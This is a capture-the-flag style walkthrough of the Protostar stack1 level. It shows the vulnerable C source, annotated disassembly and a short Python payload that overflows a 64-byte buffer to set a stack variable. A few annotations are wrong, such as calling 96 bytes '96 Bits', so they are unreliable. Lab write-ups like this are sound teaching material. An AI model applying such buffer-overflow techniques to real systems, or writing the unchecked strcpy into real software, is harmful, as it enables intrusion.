Hello Guyz,
In This Post, I am going to show you how we can win protostar stack1 level and in today's tutorial, our main focus will be on variable overwriting. we are going to learn a simple concept/technique that can overwrite the values of any variable Onto Stack during running state.
Before Starting This Walkthrough. I want to highlight Few Points.
- I'm not the creator of protostar war game. I am just a player.
- Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
Source Code :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h>
int main(int argc, char **argv) { volatile int modified; char buffer[64];
if(argc == 1) { errx(1, "please specify an argument\n"); }
modified = 0; strcpy(buffer, argv[1]);
if(modified == 0x61626364) { printf("you have correctly got the variable to the right value\n"); } else { printf("Try again, you got 0x%08x\n", modified); } }
|
Hint Provided By Exploit-Exercise.
This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.
This level is at /opt/protostar/bin/stack1
If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your readers.
Protostar is little endian
Solution:
Simply We Just Need To Overwrite the value of modified variable located Onto the Stack.
Before Start, Let's Try To Understand Situation Onto The Stack
0 28 92 96
============================================================================================
Other Things | Injectable Area | modified |
============================================================================================
Disassembly Of Codes
0x08048464 <+0>: push ebp
0x08048465 <+1>: mov ebp,esp
0x08048467 <+3>: and esp,0xfffffff0
0x0804846a <+6>: sub esp,0x60 << ====== 96 Bits Buffer Created
0x0804846d <+9>: cmp DWORD PTR [ebp+0x8],0x1 << ====== Comparing Args Variable with 1
0x08048471 <+13>: jne 0x8048487 <main+35> << ====== Jump Condition
0x08048473 <+15>: mov DWORD PTR [esp+0x4],0x80485a0
0x0804847b <+23>: mov DWORD PTR [esp],0x1
0x08048482 <+30>: call 0x8048388 <errx@plt>
0x08048487 <+35>: mov DWORD PTR [esp+0x5c],0x0 << ===== Variable Value [modified variable]
0x0804848f <+43>: mov eax,DWORD PTR [ebp+0xc] << ===== BUffer Starting Address To Insert String Through Strcpy
0x08048492 <+46>: add eax,0x4 << ===== Add 4 To EAX
0x08048495 <+49>: mov eax,DWORD PTR [eax] << ===== Loading Data From EAX mapped
0x08048497 <+51>: mov DWORD PTR [esp+0x4],eax << ===== Storing Current EAX Value Into Stack
0x0804849b <+55>: lea eax,[esp+0x1c] << ===== Starting POint Address To Insert Data Into Stack Buffer
0x0804849f <+59>: mov DWORD PTR [esp],eax
0x080484a2 <+62>: call 0x8048368 <strcpy@plt>
0x080484a7 <+67>: mov eax,DWORD PTR [esp+0x5c]
0x080484ab <+71>: cmp eax,0x61626364
0x080484b0 <+76>: jne 0x80484c0 <main+92>
0x080484b2 <+78>: mov DWORD PTR [esp],0x80485bc
0x080484b9 <+85>: call 0x8048398 <puts@plt>
0x080484be <+90>: jmp 0x80484d5 <main+113>
0x080484c0 <+92>: mov edx,DWORD PTR [esp+0x5c]
0x080484c4 <+96>: mov eax,0x80485f3
0x080484c9 <+101>: mov DWORD PTR [esp+0x4],edx
0x080484cd <+105>: mov DWORD PTR [esp],eax
0x080484d0 <+108>: call 0x8048378 <printf@plt>
0x080484d5 <+113>: leave
0x080484d6 <+114>: ret
Exploit
1 2 3 4 5 6 7 8 9 10 11 | #!/usr/bin/python # -*- coding:utf-8 -*- import struct
# Usages : ./bin/stack1 $(cat tmp)
payload = "a"*64 payload+= struct.pack("I", 0x61626364)
print payload
|
Very Easy! Hahaha.